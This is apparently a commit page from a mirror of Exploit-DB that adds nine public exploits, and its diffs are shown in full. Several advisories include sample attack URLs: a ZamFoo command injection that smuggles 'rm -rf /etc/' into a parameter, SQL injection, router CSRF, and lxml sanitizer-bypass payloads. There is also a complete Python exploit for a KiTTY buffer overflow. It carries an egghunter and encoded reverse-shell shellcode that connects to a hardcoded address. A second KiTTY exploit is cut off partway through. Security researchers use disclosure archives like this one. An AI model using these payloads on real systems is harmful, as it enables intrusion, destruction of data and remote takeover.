bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-04

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2016-01-04 05:02:55 +00:00
parent 61c40e641e
commit 5aeeaef0a2
10 changed files with 1414 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -35372,9 +35372,10 @@ id,file,description,date,author,platform,type,port
39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0
39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
39119,platforms/windows/remote/39119..py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
39120,platforms/windows/local/39120..py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122..py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0
39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0
39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0
@ -35400,3 +35401,8 @@ id,file,description,date,author,platform,type,port
39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0

Can't render this file because it is too large.

13
platforms/cgi/webapps/39156.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/67215/info
ZamFoo is prone to multiple remote command-execution vulnerabilities.
Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
ZamFoo 12.6 is vulnerable; other versions may also be affected.
https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=

9
platforms/hardware/remote/39154.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67033/info
Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected.
http://www.example.com/password.cgi?sysPassword=[Your Password]

47
platforms/linux/remote/39155.txt Executable file
View file

@ -0,0 +1,47 @@
source: http://www.securityfocus.com/bid/67159/info
lxml is prone to a security-bypass vulnerability.
An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.
Versions prior to lxml 3.3.5 are vulnerable.
from lxml.html.clean import clean_html
html = '''\
<html>
<body>
<a href="javascript:alert(0)">
aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''
print clean_html(html)
Output:
<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">
bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>

9
platforms/php/webapps/39153.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67031/info
iDevAffiliate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iDevAffiliate 5.0 and prior are vulnerable.
http://www.example.com/idevaffiliate/idevads.php?id=6&ad=[SQLi]

7
platforms/php/webapps/39157.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/67241/info
Puntopy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/novedad.php?id=[SQL Injection]

412
platforms/windows/local/39120.py Executable file
View file

@ -0,0 +1,412 @@
# Exploit Title: KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP, DoS 7/8.1/10)
# Date: 28/12/2015
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: http://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.9bis.net/kitty/
# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
# Version: 0.65.0.2p
# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
# Category: Local
"""
Disclosure Timeline:
--------------------
2015-09-13: Vulnerability discovered
2015-09-26: Vendor contacted
2015-09-28: Vendor answer
2015-10-09: KiTTY 0.65.0.3p released, still vulnerable
2015-10-20: KiTTY 0.65.1.1p released, still vulnerable
2015-11-15: KiTTY 0.66.6.1p released, seems fixed
2015-12-28: exploit published
Description :
-------------
A local overflow exists in the session file used by KiTTY portable, in the HostName parameter. It is possible to write
an overly long string to trigger an overflow. It can be used to trigger code execution on Windows XP SP3, or to crash
the program from Windows 7 to Windows 10. It has been tested with KiTTY portable 0.65.0.2p/0.65.0.3p/0.65.1.1p, but earlier versions are
likely to be vulnerable too.
WinXP -> Local Code Execution
Win7 -> Denial Of Service
Win8.1 -> Denial Of Service
Win10 -> Denial Of Service
Instructions:
-------------
- Run exploit
- Launch KiTTY, select "EvilSession" on the session list, then click "Load".
Exploitation:
-------------
When writing a 1500 bytes string to the HostName parameter in a session file, EIP is overwritten at offset 1232.
As ESP points to our buffer, we use an address doing a JMP ESP in an unprotected DLL. However, as the memory area
we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. The final
shellcode is written into another session parameter, LogFileName. After successful exploitation, a reverse shell
is given if this payload has been selected on Windows XP SP3 (on Windows 7/8.1/10, KiTTY crashes):
guillaume@kali64:~/tools$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.135.131] from (UNKNOWN) [192.168.135.130] 1955
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\kitty\App\KiTTY>
"""
egg = "w00t" # \x77\x30\x30\x74
# Windows NtAccessCheckAndAuditAlarm EggHunter
# Size: 32 bytes
egghunter = (
"\x66\x81\xca\xff\x0f" # or dx,0x0fff
"\x42" # inc edx
"\x52" # push edx
"\x6a\x02" # push byte +0x02
"\x58" # pop eax
"\xcd\x2e" # int 0x2e
"\x3c\x05" # cmp al,0x5
"\x5a" # pop edx
"\x74\xef" # jz 0x0
"\xb8\x77\x30\x30\x74" # mov eax,0x74303077 ; egg
"\x8b\xfa" # mov edi,edx
"\xaf" # scasd
"\x75\xea" # jnz 0x5
"\xaf" # scasd
"\x75\xe7" # jnz 0x5
"\xff\xe7" # jmp edi
)
# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want)
# Encoder: x86/shikata_ga_nai
# Bad chars: '\x00\x0a\x0d\x5c'
# Size: 351 bytes
shellcode = (
"\xb8\xa9\xbf\xda\xcb\xdd\xc0\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x52\x83\xee\xfc\x31\x46\x0e\x03\xef\xb1\x38\x3e\x13\x25\x3e"
"\xc1\xeb\xb6\x5f\x4b\x0e\x87\x5f\x2f\x5b\xb8\x6f\x3b\x09\x35"
"\x1b\x69\xb9\xce\x69\xa6\xce\x67\xc7\x90\xe1\x78\x74\xe0\x60"
"\xfb\x87\x35\x42\xc2\x47\x48\x83\x03\xb5\xa1\xd1\xdc\xb1\x14"
"\xc5\x69\x8f\xa4\x6e\x21\x01\xad\x93\xf2\x20\x9c\x02\x88\x7a"
"\x3e\xa5\x5d\xf7\x77\xbd\x82\x32\xc1\x36\x70\xc8\xd0\x9e\x48"
"\x31\x7e\xdf\x64\xc0\x7e\x18\x42\x3b\xf5\x50\xb0\xc6\x0e\xa7"
"\xca\x1c\x9a\x33\x6c\xd6\x3c\x9f\x8c\x3b\xda\x54\x82\xf0\xa8"
"\x32\x87\x07\x7c\x49\xb3\x8c\x83\x9d\x35\xd6\xa7\x39\x1d\x8c"
"\xc6\x18\xfb\x63\xf6\x7a\xa4\xdc\x52\xf1\x49\x08\xef\x58\x06"
"\xfd\xc2\x62\xd6\x69\x54\x11\xe4\x36\xce\xbd\x44\xbe\xc8\x3a"
"\xaa\x95\xad\xd4\x55\x16\xce\xfd\x91\x42\x9e\x95\x30\xeb\x75"
"\x65\xbc\x3e\xd9\x35\x12\x91\x9a\xe5\xd2\x41\x73\xef\xdc\xbe"
"\x63\x10\x37\xd7\x0e\xeb\xd0\x18\x66\x74\xa3\xf1\x75\x7a\xb5"
"\x5d\xf3\x9c\xdf\x4d\x55\x37\x48\xf7\xfc\xc3\xe9\xf8\x2a\xae"
"\x2a\x72\xd9\x4f\xe4\x73\x94\x43\x91\x73\xe3\x39\x34\x8b\xd9"
"\x55\xda\x1e\x86\xa5\x95\x02\x11\xf2\xf2\xf5\x68\x96\xee\xac"
"\xc2\x84\xf2\x29\x2c\x0c\x29\x8a\xb3\x8d\xbc\xb6\x97\x9d\x78"
"\x36\x9c\xc9\xd4\x61\x4a\xa7\x92\xdb\x3c\x11\x4d\xb7\x96\xf5"
"\x08\xfb\x28\x83\x14\xd6\xde\x6b\xa4\x8f\xa6\x94\x09\x58\x2f"
"\xed\x77\xf8\xd0\x24\x3c\x08\x9b\x64\x15\x81\x42\xfd\x27\xcc"
"\x74\x28\x6b\xe9\xf6\xd8\x14\x0e\xe6\xa9\x11\x4a\xa0\x42\x68"
"\xc3\x45\x64\xdf\xe4\x4f"
)
junk = '\x41' * 1232
ret = '\x7B\x46\x86\x7C' # 0x7C86467B / jmp esp / kernel32.dll
nops = '\x90' * 8
eggmark = egg * 2
padding = '\x42' * (1500 - len(junk) - len(ret) - len(egghunter))
payload1 = junk + ret + egghunter + padding # Egg Hunter
payload2 = eggmark + nops + shellcode # Final Shellcode
# A whole KiTTY session file, written to \Sessions\EvilSession"
buffer = "PortKnocking\\\\\r"
buffer += "ACSinUTF\\0\\\r"
buffer += "Comment\\\\\r"
buffer += "CtrlTabSwitch\\0\\\r"
buffer += "Password\\1350b\\\r"
buffer += "ForegroundOnBell\\0\\\r"
buffer += "SaveWindowPos\\0\\\r"
buffer += "WindowState\\0\\\r"
buffer += "TermYPos\\-1\\\r"
buffer += "TermXPos\\-1\\\r"
buffer += "LogTimeRotation\\0\\\r"
buffer += "Folder\\Default\\\r"
buffer += "AutocommandOut\\\\\r"
buffer += "Autocommand\\\\\r"
buffer += "LogTimestamp\\\\\r"
buffer += "AntiIdle\\\\\r"
buffer += "ScriptfileContent\\\\\r"
buffer += "Scriptfile\\\\\r"
buffer += "SFTPConnect\\\\\r"
buffer += "IconeFile\\\\\r"
buffer += "Icone\\1\\\r"
buffer += "SaveOnExit\\0\\\r"
buffer += "Fullscreen\\0\\\r"
buffer += "Maximize\\0\\\r"
buffer += "SendToTray\\0\\\r"
buffer += "TransparencyValue\\0\\\r"
buffer += "zDownloadDir\\C%3A%5C\\\r"
buffer += "szOptions\\-e%20-v\\\r"
buffer += "szCommand\\\\\r"
buffer += "rzOptions\\-e%20-v\\\r"
buffer += "rzCommand\\\\\r"
buffer += "CygtermCommand\\\\\r"
buffer += "Cygterm64\\0\\\r"
buffer += "CygtermAutoPath\\1\\\r"
buffer += "CygtermAltMetabit\\0\\\r"
buffer += "HyperlinkRegularExpression\\(((https%3F%7Cftp)%3A%5C%2F%5C%2F)%7Cwww%5C.)(([0-9]+%5C.[0-9]+%5C.[0-9]+%5C.[0-9]+)%7Clocalhost%7C([a-zA-Z0-9%5C-]+%5C.)%2A[a-zA-Z0-9%5C-]+%5C.(com%7Cnet%7Corg%7Cinfo%7Cbiz%7Cgov%7Cname%7Cedu%7C[a-zA-Z][a-zA-Z]))(%3A[0-9]+)%3F((%5C%2F%7C%5C%3F)[^%20%22]%2A[^%20,;%5C.%3A%22%3E)])%3F\\\r"
buffer += "HyperlinkRegularExpressionUseDefault\\1\\\r"
buffer += "HyperlinkBrowser\\\\\r"
buffer += "HyperlinkBrowserUseDefault\\1\\\r"
buffer += "HyperlinkUseCtrlClick\\1\\\r"
buffer += "HyperlinkUnderline\\0\\\r"
buffer += "FailureReconnect\\0\\\r"
buffer += "WakeupReconnect\\0\\\r"
buffer += "SSHManualHostKeys\\\\\r"
buffer += "ConnectionSharingDownstream\\1\\\r"
buffer += "ConnectionSharingUpstream\\1\\\r"
buffer += "ConnectionSharing\\0\\\r"
buffer += "WindowClass\\\\\r"
buffer += "SerialFlowControl\\1\\\r"
buffer += "SerialParity\\0\\\r"
buffer += "SerialStopHalfbits\\2\\\r"
buffer += "SerialDataBits\\8\\\r"
buffer += "SerialSpeed\\9600\\\r"
buffer += "SerialLine\\COM1\\\r"
buffer += "ShadowBoldOffset\\1\\\r"
buffer += "ShadowBold\\0\\\r"
buffer += "WideBoldFontHeight\\0\\\r"
buffer += "WideBoldFontCharSet\\0\\\r"
buffer += "WideBoldFontIsBold\\0\\\r"
buffer += "WideBoldFont\\\\\r"
buffer += "WideFontHeight\\0\\\r"
buffer += "WideFontCharSet\\0\\\r"
buffer += "WideFontIsBold\\0\\\r"
buffer += "WideFont\\\\\r"
buffer += "BoldFontHeight\\0\\\r"
buffer += "BoldFontCharSet\\0\\\r"
buffer += "BoldFontIsBold\\0\\\r"
buffer += "BoldFont\\\\\r"
buffer += "ScrollbarOnLeft\\0\\\r"
buffer += "LoginShell\\1\\\r"
buffer += "StampUtmp\\1\\\r"
buffer += "BugChanReq\\0\\\r"
buffer += "BugWinadj\\0\\\r"
buffer += "BugOldGex2\\0\\\r"
buffer += "BugMaxPkt2\\0\\\r"
buffer += "BugRekey2\\0\\\r"
buffer += "BugPKSessID2\\0\\\r"
buffer += "BugRSAPad2\\0\\\r"
buffer += "BugDeriveKey2\\0\\\r"
buffer += "BugHMAC2\\0\\\r"
buffer += "BugIgnore2\\0\\\r"
buffer += "BugRSA1\\0\\\r"
buffer += "BugPlainPW1\\0\\\r"
buffer += "BugIgnore1\\0\\\r"
buffer += "PortForwardings\\\\\r"
buffer += "RemotePortAcceptAll\\0\\\r"
buffer += "LocalPortAcceptAll\\0\\\r"
buffer += "X11AuthFile\\\\\r"
buffer += "X11AuthType\\1\\\r"
buffer += "X11Display\\\\\r"
buffer += "X11Forward\\0\\\r"
buffer += "BlinkText\\0\\\r"
buffer += "BCE\\1\\\r"
buffer += "LockSize\\0\\\r"
buffer += "EraseToScrollback\\1\\\r"
buffer += "ScrollOnDisp\\1\\\r"
buffer += "ScrollOnKey\\0\\\r"
buffer += "ScrollBarFullScreen\\0\\\r"
buffer += "ScrollBar\\1\\\r"
buffer += "CapsLockCyr\\0\\\r"
buffer += "Printer\\\\\r"
buffer += "UTF8Override\\1\\\r"
buffer += "CJKAmbigWide\\0\\\r"
buffer += "LineCodePage\\\\\r"
buffer += "Wordness224\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
buffer += "Wordness192\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
buffer += "Wordness160\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
buffer += "Wordness128\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
buffer += "Wordness96\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1\\\r"
buffer += "Wordness64\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2\\\r"
buffer += "Wordness32\\0,1,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1\\\r"
buffer += "Wordness0\\0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\\\r"
buffer += "MouseOverride\\1\\\r"
buffer += "RectSelect\\0\\\r"
buffer += "MouseIsXterm\\0\\\r"
buffer += "PasteRTF\\0\\\r"
buffer += "RawCNP\\0\\\r"
buffer += "Colour33\\187,187,187\\\r"
buffer += "Colour32\\0,0,0\\\r"
buffer += "Colour31\\187,187,187\\\r"
buffer += "Colour30\\0,187,187\\\r"
buffer += "Colour29\\187,0,187\\\r"
buffer += "Colour28\\0,0,187\\\r"
buffer += "Colour27\\187,187,0\\\r"
buffer += "Colour26\\0,187,0\\\r"
buffer += "Colour25\\187,0,0\\\r"
buffer += "Colour24\\0,0,0\\\r"
buffer += "Colour23\\0,0,0\\\r"
buffer += "Colour22\\187,187,187\\\r"
buffer += "Colour21\\255,255,255\\\r"
buffer += "Colour20\\187,187,187\\\r"
buffer += "Colour19\\85,255,255\\\r"
buffer += "Colour18\\0,187,187\\\r"
buffer += "Colour17\\255,85,255\\\r"
buffer += "Colour16\\187,0,187\\\r"
buffer += "Colour15\\85,85,255\\\r"
buffer += "Colour14\\0,0,187\\\r"
buffer += "Colour13\\255,255,85\\\r"
buffer += "Colour12\\187,187,0\\\r"
buffer += "Colour11\\85,255,85\\\r"
buffer += "Colour10\\0,187,0\\\r"
buffer += "Colour9\\255,85,85\\\r"
buffer += "Colour8\\187,0,0\\\r"
buffer += "Colour7\\85,85,85\\\r"
buffer += "Colour6\\0,0,0\\\r"
buffer += "Colour5\\0,255,0\\\r"
buffer += "Colour4\\0,0,0\\\r"
buffer += "Colour3\\85,85,85\\\r"
buffer += "Colour2\\0,0,0\\\r"
buffer += "Colour1\\255,255,255\\\r"
buffer += "Colour0\\187,187,187\\\r"
buffer += "SelectedAsColour\\0\\\r"
buffer += "UnderlinedAsColour\\0\\\r"
buffer += "BoldAsColourTest\\1\\\r"
buffer += "DisableBottomButtons\\1\\\r"
buffer += "WindowHasSysMenu\\1\\\r"
buffer += "WindowMaximizable\\1\\\r"
buffer += "WindowMinimizable\\1\\\r"
buffer += "WindowClosable\\1\\\r"
buffer += "BoldAsColour\\1\\\r"
buffer += "Xterm256Colour\\1\\\r"
buffer += "ANSIColour\\1\\\r"
buffer += "TryPalette\\0\\\r"
buffer += "UseSystemColours\\0\\\r"
buffer += "FontVTMode\\4\\\r"
buffer += "FontQuality\\0\\\r"
buffer += "FontHeight\\10\\\r"
buffer += "FontCharSet\\0\\\r"
buffer += "FontIsBold\\0\\\r"
buffer += "Font\\Courier%20New\\\r"
buffer += "TermHeight\\24\\\r"
buffer += "TermWidth\\80\\\r"
buffer += "WinTitle\\\\\r"
buffer += "WinNameAlways\\1\\\r"
buffer += "DisableBidi\\0\\\r"
buffer += "DisableArabicShaping\\0\\\r"
buffer += "CRImpliesLF\\0\\\r"
buffer += "LFImpliesCR\\0\\\r"
buffer += "AutoWrapMode\\1\\\r"
buffer += "DECOriginMode\\0\\\r"
buffer += "ScrollbackLines\\10000\\\r"
buffer += "BellOverloadS\\5000\\\r"
buffer += "BellOverloadT\\2000\\\r"
buffer += "BellOverloadN\\5\\\r"
buffer += "BellOverload\\1\\\r"
buffer += "BellWaveFile\\\\\r"
buffer += "BeepInd\\0\\\r"
buffer += "Beep\\1\\\r"
buffer += "BlinkCur\\0\\\r"
buffer += "CurType\\0\\\r"
buffer += "WindowBorder\\1\\\r"
buffer += "SunkenEdge\\0\\\r"
buffer += "HideMousePtr\\0\\\r"
buffer += "FullScreenOnAltEnter\\0\\\r"
buffer += "AlwaysOnTop\\0\\\r"
buffer += "Answerback\\KiTTY\\\r"
buffer += "LocalEdit\\2\\\r"
buffer += "LocalEcho\\2\\\r"
buffer += "TelnetRet\\1\\\r"
buffer += "TelnetKey\\0\\\r"
buffer += "CtrlAltKeys\\1\\\r"
buffer += "ComposeKey\\0\\\r"
buffer += "AltOnly\\0\\\r"
buffer += "AltSpace\\0\\\r"
buffer += "AltF4\\1\\\r"
buffer += "NetHackKeypad\\0\\\r"
buffer += "ApplicationKeypad\\0\\\r"
buffer += "ApplicationCursorKeys\\0\\\r"
buffer += "NoRemoteCharset\\0\\\r"
buffer += "NoDBackspace\\0\\\r"
buffer += "RemoteQTitleAction\\1\\\r"
buffer += "NoRemoteWinTitle\\0\\\r"
buffer += "NoAltScreen\\0\\\r"
buffer += "NoRemoteResize\\0\\\r"
buffer += "NoMouseReporting\\0\\\r"
buffer += "NoApplicationCursors\\0\\\r"
buffer += "NoApplicationKeys\\0\\\r"
buffer += "LinuxFunctionKeys\\0\\\r"
buffer += "RXVTHomeEnd\\0\\\r"
buffer += "BackspaceIsDelete\\1\\\r"
buffer += "PassiveTelnet\\0\\\r"
buffer += "RFCEnviron\\0\\\r"
buffer += "RemoteCommand\\\\\r"
buffer += "PublicKeyFile\\\\\r"
buffer += "SSH2DES\\0\\\r"
buffer += "SshProt\\3\\\r"
buffer += "SshNoShell\\0\\\r"
buffer += "GSSCustom\\\\\r"
buffer += "GSSLibs\\gssapi32,sspi,custom\\\r"
buffer += "AuthGSSAPI\\1\\\r"
buffer += "AuthKI\\1\\\r"
buffer += "AuthTIS\\0\\\r"
buffer += "SshBanner\\1\\\r"
buffer += "SshNoAuth\\0\\\r"
buffer += "RekeyBytes\\1G\\\r"
buffer += "RekeyTime\\60\\\r"
buffer += "KEX\\dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN\\\r"
buffer += "Cipher\\aes,blowfish,3des,WARN,arcfour,des\\\r"
buffer += "ChangeUsername\\0\\\r"
buffer += "GssapiFwd\\0\\\r"
buffer += "AgentFwd\\0\\\r"
buffer += "TryAgent\\1\\\r"
buffer += "Compression\\0\\\r"
buffer += "NoPTY\\0\\\r"
buffer += "LocalUserName\\\\\r"
buffer += "UserNameFromEnvironment\\0\\\r"
buffer += "UserName\\\\\r"
buffer += "Environment\\\\\r"
buffer += "ProxyTelnetCommand\\connect%20%25host%20%25port%5Cn\\\r"
buffer += "ProxyPassword\\\\\r"
buffer += "ProxyUsername\\\\\r"
buffer += "ProxyPort\\80\\\r"
buffer += "ProxyHost\\proxy\\\r"
buffer += "ProxyMethod\\0\\\r"
buffer += "ProxyLocalhost\\0\\\r"
buffer += "ProxyDNS\\1\\\r"
buffer += "ProxyExcludeList\\\\\r"
buffer += "AddressFamily\\0\\\r"
buffer += "TerminalModes\\CS7=A,CS8=A,DISCARD=A,DSUSP=A,ECHO=A,ECHOCTL=A,ECHOE=A,ECHOK=A,ECHOKE=A,ECHONL=A,EOF=A,EOL=A,EOL2=A,ERASE=A,FLUSH=A,ICANON=A,ICRNL=A,IEXTEN=A,IGNCR=A,IGNPAR=A,IMAXBEL=A,INLCR=A,INPCK=A,INTR=A,ISIG=A,ISTRIP=A,IUCLC=A,IXANY=A,IXOFF=A,IXON=A,KILL=A,LNEXT=A,NOFLSH=A,OCRNL=A,OLCUC=A,ONLCR=A,ONLRET=A,ONOCR=A,OPOST=A,PARENB=A,PARMRK=A,PARODD=A,PENDIN=A,QUIT=A,REPRINT=A,START=A,STATUS=A,STOP=A,SUSP=A,SWTCH=A,TOSTOP=A,WERASE=A,XCASE=A\\\r"
buffer += "TerminalSpeed\\38400,38400\\\r"
buffer += "TerminalType\\xterm\\\r"
buffer += "TCPKeepalives\\0\\\r"
buffer += "TCPNoDelay\\1\\\r"
buffer += "PingIntervalSecs\\0\\\r"
buffer += "PingInterval\\0\\\r"
buffer += "WarnOnClose\\1\\\r"
buffer += "CloseOnExit\\1\\\r"
buffer += "PortNumber\\22\\\r"
buffer += "Protocol\\ssh\\\r"
buffer += "SSHLogOmitData\\0\\\r"
buffer += "SSHLogOmitPasswords\\1\\\r"
buffer += "LogFlush\\1\\\r"
buffer += "LogFileClash\\-1\\\r"
buffer += "LogType\\0\\\r"
buffer += "LogFileName\\" + payload2 + "\\\r" # Shellcode
buffer += "HostName\\" + payload1 + "\\\r" # Egg Hunter
buffer += "Present\\1\\\r"
buffer += "LogHost\\\\\r"
# Location of our evil session file (modify with your KiTTY directory)
file = "C:\\kitty\\App\\KiTTY\\Sessions\\EvilSession"
try:
print "\n[*] Writing to %s (%s bytes)" % (file, len(buffer))
f = open(file,'w')
f.write(buffer)
f.close()
print "[*] Done!"
except:
print "[-] Error writing %s" % file

304
platforms/windows/local/39121.py Executable file
View file

@ -0,0 +1,304 @@
# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)
# Date: 28/12/2015
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: http://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.9bis.net/kitty/
# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
# Version: 0.65.0.2p
# Tested on: Windows 7 Pro x64 (FR)
# Category: Local
"""
Disclosure Timeline:
--------------------
2015-09-18: Vulnerability discovered
2015-09-26: Vendor contacted
2015-09-28: Vendor answer
2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on another kitty.ini parameter
2015-11-15: KiTTY 0.66.6.1p released, seems fixed
2015-12-28: exploit published
Description :
-------------
A local overflow exists in kitty.ini file used by KiTTY portable. By writing a 1048 bytes string into
the kitty.ini file, an overflow occurs that makes Kitty crashing. At time of the crash, EIP is
overwritten at offset 1036. As all DLLs are ALSR and DEP protected, and rebased, we can only use
kitty_portable.exe addresses, which start with a NULL. Successful exploitation will grant an
attacker a reverse shell on Windows 7 Pro x64.
Win7 -> Code Execution
Instructions:
-------------
- Run exploit
- Launch KiTTY
Exploitation:
-------------
As EDX register points to our buffer, it seems like using a return address pointing to a
JMP EDX instruction would do the trick. However this is not the case, because of the address containing
a NULL byte, our 1048 bytes buffer is truncated to 1039 bytes, and an access violation occurs before EIP could be
overwritten:
EAX = 00000041
00533DA2 0000 ADD BYTE PTR DS:[EAX],AL <---- Access violation when writing to [EAX]
00533DA4 00 DB 00
